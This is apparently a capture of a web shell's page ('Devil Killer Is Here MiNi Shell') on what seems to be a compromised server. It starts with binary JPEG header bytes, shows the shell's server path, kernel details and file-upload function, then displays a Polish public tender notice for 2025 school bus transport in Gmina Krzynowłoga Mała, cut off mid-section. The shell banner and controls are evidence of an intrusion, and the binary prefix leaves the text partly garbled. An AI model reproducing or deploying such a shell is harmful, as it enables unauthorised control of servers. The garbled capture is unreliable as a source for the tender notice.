JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20241122/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20241122/0061184601-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> DOWOŻENIE UCZNIÓW DO SZKÓŁ Z TERENU GMINY KRZYNOWŁOGA MAŁA W 2025 ROKU </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA KRZYNOWŁOGA MAŁA</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 550667847</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Kościelna 3</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Krzynowłoga Mała</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">06-316</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL924 - Ostrołęcki</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia@krzynowlogamala.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.krzynowlogamala.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> DOWOŻENIE UCZNIÓW DO SZKÓŁ Z TERENU GMINY KRZYNOWŁOGA MAŁA W 2025 ROKU </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-b7ccee93-bb4a-4100-be36-0cdd9a7cd354</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00611846</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-11-22</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://krzynowlogamala.ezamawiajacy.pl/servlet/HomeServlet <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://krzynowlogamala.ezamawiajacy.pl/servlet/HomeServlet</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1) W postępowaniu o udzielenie<br/>zamówienia komunikacja między Zamawiającym<br/>a Wykonawcami odbywa się przy użyciu https://swjm2020.ezamawiajacy.pl/servlet/HomeServlet, zwanej dalej Platformą.<br/>2) Złożenie oferty w postępowaniu wymaga zalogowania Wykonawcy do Systemu na subdomenie:<br/>https://krzynowlogamala.ezamawiajacy.pl/servlet/HomeServlet lub https://oneplace.marketplanet.pl. Korzystanie z Platformy jest<br/>bezpłatne w zakresie niniejszego postępowania.<br/>3) Wykonawca po wybraniu opcji „przystąp do postępowania” zostanie przekierowany<br/>do strony https://oneplace.marketplanet.pl, gdzie zostanie powiadomiony o możliwości zalogowania lub do założenia bezpłatnego<br/>konta. Aby się zarejestrować, należy wybrać przycisk „Załóż konto za darmo”, znajdujące się w górnym prawym rogu i postępować<br/>zgodnie z dalszymi instrukcjami.<br/>4) Wykonawca zakłada konto wykonując kroki procesu rejestracyjnego; podaje adres e-mail, ustanawia hasło, następnie powtarza<br/>hasło, wpisuje kod z obrazka, akceptuje regulamin, klika polecenie „zarejestruj się”.<br/>5) Rejestracja Wykonawcy trwa maksymalnie do 2 dni roboczych. W związku z tym Zamawiający zaleca Wykonawcom<br/>uwzględnienie czasu niezbędnego na rejestrację w procesie złożenia Oferty w postaci elektronicznej. Wykonawca wraz z<br/>potwierdzeniem złożenia wniosku rejestracyjnego otrzyma informacje, o możliwości przyspieszenia procedury założenia konta,<br/>wówczas należy skontaktować się pod numerem telefonu podanym w ww. potwierdzeniu.<br/>6) Po założeniu konta Wykonawca ma możliwość złożenia Oferty w postępowaniu.<br/>7) Komunikacja między Zamawiającym a Wykonawcami, w szczególności zawiadomienia oraz informacje, przekazywane są w<br/>formie elektronicznej za pośrednictwem Platformy. Za datę przekazania zaświadczeń oraz informacji przyjmuje się datę ich wysłania<br/>za pośrednictwem zakładki „Korespondencja”.<br/>8) Zamawiający informuje, iż w przypadku jakichkolwiek wątpliwości związanych<br/>z zasadami korzystania z Platformy, Wykonawca powinien skontaktować się<br/>z dostawcą rozwiązania teleinformatycznego Platforma eZamawiający, tel. +48 (22) 257 22 23 (infolinia dostępna w dni robocze, w<br/>godzinach 9.00-17.00), e-mail: oneplace@marketplanet.pl</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE)<br/>2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie<br/>swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o danych) (Dz. U. UE L119 z dnia<br/>4 maja 2016 r.); zwanego dalej „RODO”, informujemy, że:<br/>1) administratorem Pani/Pana danych osobowych jest Wójt Gminy Krzynowłoga Mała<br/>2) administrator wyznaczył Inspektora Danych Osobowych – Pan Andrzej Włodarczyk<br/>3) Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z przedmiotowym<br/>postępowaniem o udzielenie zamówienia publicznego, prowadzonym w trybie przetargu nieograniczonego.<br/>4) odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w<br/>oparciu o art. 74 PZP.<br/>5) Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 PZP przez okres 4 lat od dnia zakończenia postępowania<br/>o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy;<br/>6) obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym<br/>określonym w przepisanych PZP, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego.<br/>7) w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosownie do art. 22<br/>RODO.<br/>8) posiada Pani/Pan:<br/>a) na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących (w przypadku, gdy skorzystanie z tego<br/>prawa wymagałoby po stronie administratora niewspółmiernie dużego wysiłku może zostać Pani/Pan zobowiązana do wskazania<br/>dodatkowych informacji mających na celu sprecyzowanie żądania, w szczególności podania nazwy lub daty postępowania o<br/>udzielenie zamówienia publicznego lub konkursu albo sprecyzowanie nazwy lub daty zakończonego postępowania o udzielenie<br/>zamówienia);<br/>b) na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych (skorzystanie z prawa do sprostowania nie<br/>może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie<br/>niezgodnym z PZP oraz nie może naruszać integralności protokołu oraz jego załączników);<br/>c) na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem<br/>okresu trwania postępowania o udzielenie zamówienia publicznego lub konkursu oraz przypadków, o których mowa w art. 18 ust. 2<br/>RODO (prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia<br/>korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego);<br/>d) prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych<br/>osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>9) nie przysługuje Pani/Panu:<br/>a) w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>b) prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>c) na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania<br/>Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO;<br/>10) przysługuje Pani/Panu prawo wniesienia skargi do organu nadzorczego na niezgodne z RODO przetwarzanie Pani/Pana danych<br/>osobowych przez administratora. Organem właściwym dla przedmiotowej skargi jest Prezes Urzędu Ochrony Danych Osobowych,<br/>ul. Stawki 2, 00-193 Warszawa</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">IGS.271.11.2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia jest świadczenie usługi w zakresie dowozu uczniów z terenu Gminy Krzynowłoga Mała do<br/>szkół w miejscowościach Krzynowłoga Mała, Romany Sebory, Ulatowo Adamy w 2025 r.<br/>2. W zakres usługi wchodzi przewóz dzieci i młodzieży z miejsca zamieszkania do szkoły i ich odwóz po zajęciach do<br/>miejsca zamieszkania W związku z ewentualną zmianą tras wiązać się może również zwiększenie liczby potrzebnych<br/>autobusów. W przypadku zwiększenia liczby autobusów cena biletu nie ulegnie zmianie (możliwość taką należy ująć w<br/>oferowanej cenie biletu). Zamawiający informuje, iż część kursów odbywa się po drogach żwirowych o różnym standardzie<br/>utrzymania. Celem poznania jakości dróg oraz specyfiki terenu Zamawiający zaleca zapoznanie się z trasami.<br/>3. Wykonawca zobowiązuje się również w cenie biletu do zapewnienia dowozu i rozwozu uczniów w trakcie organizowanej „<br/>Choinki Szkolnej”. Termin oraz trasy zostaną uzgodnione bezpośrednio z Dyrektorem każdej ze szkół.<br/>4. Rozkład tras:<br/>Trasa I<br/>Kurs I<br/>6.45 Krzynowłoga Mała Rudno Kmiece (7.00) Rudno Jeziorowe (7.05)<br/>żwirownia 7,08 Ożumiech (7,15) Rudno Kosiły (7,20) Cichowo (7.30) Chmieleń<br/>Wielki (7.35) Chmielonek (7.40) Krzynowłoga M ała.<br/>.<br/>Kurs II 12.45 Krzynowłoga Mała Piastowo(12.50) Czaplice Kurki Czaplice Bąki<br/>Krajewo Wielkie (13.05) Krajewo Kłódki Romany Zalesie Grabowo Skorupki<br/>Grabowo Zawady Krzynowłoga Mała (kolonia 13.23) Chmieleń Wielki (13.32)<br/>Chmie lonek (13:27) Krzynowłoga Mała (13.40)<br/>Kurs III<br/>13.50 Krzynowłoga Mała Wiktorowo Borowe Gryki Borowe Chrzczany (13.58)<br/>Łoje (14.03) Krzynowłoga Mała (14.12).<br/>Kurs IV<br/>14.20 Krzynowłoga Mała Wiktorowo Borowe Chrzczany Borowe Gryki Rudno<br/>Je ziorowe Rudno Kmiece Ożumiech Rudno Kosiły Krzynowłoga Mała<br/>Łączna ilość kilometrów<br/>trasy ok. 75 km<br/>Trasa II<br/>Kurs V<br/>7.00 Krzynowłoga Mała Grządki (7.03) Ulatowo Zalesie (7.06) Świniary (7.10)<br/>Czaplice Bąki (7.15) Czaplice Kurki (7.2 3 ) Romany Karcze (7.30) Krajewo<br/>Wielkie (7.38) Krajewo Kłódki (7.42) Grabowo Skorupki (7.48) Grabowo<br/>Zawady Krzynowłoga Mała.<br/>Łączna ilość kilometrów trasy<br/>ok. 45 km<br/>Trasa III<br/>Kurs VI<br/>6.30 Krzynowłoga Mała Skierkowizna Ulatowo Czerniaki Ulatowo Rumunek-Świniary Ulatowo Żyły Ulatowo Borzuchy Szkoła Ulatowo Adamy<br/>Skierkowizna Plewnik Goski Wąsosze Krzynowłoga Mała.<br/>Kurs VII<br/>12.30 Krzynowłoga Mała Rudno Kosiły Ożumiech Rudno Kmiece Rudno<br/>Jeziorowe Krz ynowłoga Mała.<br/>Kurs VIII<br/>13.30 Krzynowłoga Mała Marianowo Ostrowe (wszystkie) Goski Wąsosze<br/>Krajewo Wierciochy.<br/>Kurs IX<br/>14.10 Krzynowłoga Mała Krajewo Wierciochy Ostrowe (wszystkie) Morawy<br/>Wielkie Łanięta Kaki Mroczki Grządki Plewnik Świniary Ulatowo Zalesie<br/>Krzynowłoga Mała.<br/>Łączna ilość kilometrów trasy<br/>ok. 135 km<br/>Trasa<br/>I IV<br/>Kurs X<br/>6.30 Krzynowłoga Mała Romany Janowięta,(6.40) Romany Fuszki (6.50), Kaki<br/>Mroczki (7.05) Romany Sebory (7.20) Goski Wąsosze(7.30) Ostrowe<br/>Stańczyki,(7.35) Zbrochy (7.40 przy figurce) Marianowo (7.45) Krzynowłoga<br/>Mała<br/>Kurs XI<br/>12.40 Krzynowłoga Mała Marianowo 12.50 Morawy Śliwki 12.55 Morawy<br/>Wielkie 13.00 Łanięta 13.05 Romany Sebory 13.10 Mor awy Wielkie 13.20<br/>Łanięta 13.15 Romany Fuszki 13.35 R. Janowięta 13.00 Kaki Mroczki 14.10<br/>Ulatowo Adamy 14.15 Ulatowo Borzuchy 14.25 Ulatowo Czerniaki 14.35<br/>Skierkowizna 14.45 Ulatowo Rumunek 14.55 Ulatowo Zalesie 15.05 Świniary<br/>15.10 Krzynowłoga Mała.<br/>Łączna ilość kilometrów<br/>trasy około 70 km<br/>Trasa V<br/>Dowozy<br/>Kurs XII<br/>6.30 Krzynowłoga Mała Morawy Śliwki (7.00) Morawy Wielkie (7.10) Łanięta<br/>( Łanięta I R. Sebory (7.20) Łoje (7.30) Borowe Chrzczany Borowe<br/>Gryki Wiktorowo ( Krzynowłoga Mała.<br/>Odwozy<br/>Kurs XIII<br/>12.50 Krzynowłoga Mała Marianowo 13.20 Krzynowłoga Mała Krajewo<br/>Wierciochy Goski Wąsosze Plewnik Grządki Świniary Ulatowo Zalesie<br/>Romany Karcze Krzynowłoga Mała.<br/>Kurs XIV 14.10. Krzynowłoga Mała Cichowo Chmieleń Wielki Chmielonek Masiak<br/>Grabowo Rżańce Grabowo Skorupki Krajewo Kłódki Krajewo Wielkie Czaplice<br/>Bąki Czaplice Kurki Krzynowłoga Mała<br/>Łączna ilość kilometrów<br/>trasy około 110 km </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">60100000-9 - Usługi w zakresie transportu drogowego</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">czas podstawienia pojazdu zastępczego</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy:<br/>1) nie podlegają wykluczeniu z postępowania;<br/>2) spełniają warunki udziału w postępowaniu dotyczące uprawnień do prowadzenia określonej działalności gospodarczej lub<br/>zawodowej.<br/>Warunek dotyczący uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej zostanie spełniony,<br/>jeżeli Wykonawca udowodni, że posiada aktualną licencję na wykonywanie krajowego transportu drogowego osób zgodnie z<br/>ustawą z dnia 6 września 2001 roku o transporcie drogowym (Dz. U. z 2022 poz. 180, ze zm.) oraz z ustawą z dnia 20<br/>czerwca 1997 r. – Prawo o ruchu drogowym<br/>(Dz.U. z 2022 r. poz. 988 ze zm.).<br/>Uwaga. Przy ocenie spełniania tego warunku udziału przez Wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia (konsorcjum, spółka cywilna) posiadanie uprawnień, o których mowa powyżej, jest wymagane od każdego z<br/>Wykonawców wspólnie ubiegających się o udzielenie zamówienia w takim zakresie, w jakim będą oni wykonywać usługę.<br/>Warunek dotyczący zdolności technicznej lub zawodowej zostanie spełniony jeżeli Wykonawca wykaże :<br/>1) dysponowanie pojazdami do realizacji przedmiotu zamówienia, tj.: dysponowanie minimum 5 sprawnymi technicznie<br/>autobusami o liczbie miejsc siedzących dostosowanych do ilości dowożonych osób.<br/>Ocena potwierdzenia, czy wykonawca nie podlega wykluczeniu oraz wykazał spełnienie warunków udziału w postępowaniu<br/>nastąpi wg formuły „spełnia - nie spełnia” na podstawie wymaganych i załączonych przez wykonawcę dokumentów i<br/>oświadczeń wymienionych w rozdziale pn. „Podmiotowe środki dowodowe” <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1.Wykaz posiadanego sprzętu – autobusy wg załącznika nr 4 do SWZ</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1) odpis lub informację z<br/>Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4<br/>ustawy, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub<br/>ewidencji;<br/>2) aktualna licencję na wykonywanie krajowego transportu drogowego osób zgodnie z ustawą z dnia 6 września 2001 roku o<br/>transporcie drogowym (Dz. U. z 2022 poz. 180, z późn. zm.)</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Pełnomocnictwo w przypadku składania oferty wspólnej <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia.<br/>1. W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców oświadczenie, o<br/>niepodleganiu wykluczeniu i spełnianiu warunków udziału w postępowaniu, składa każdy z Wykonawców wspólnie<br/>ubiegających się o 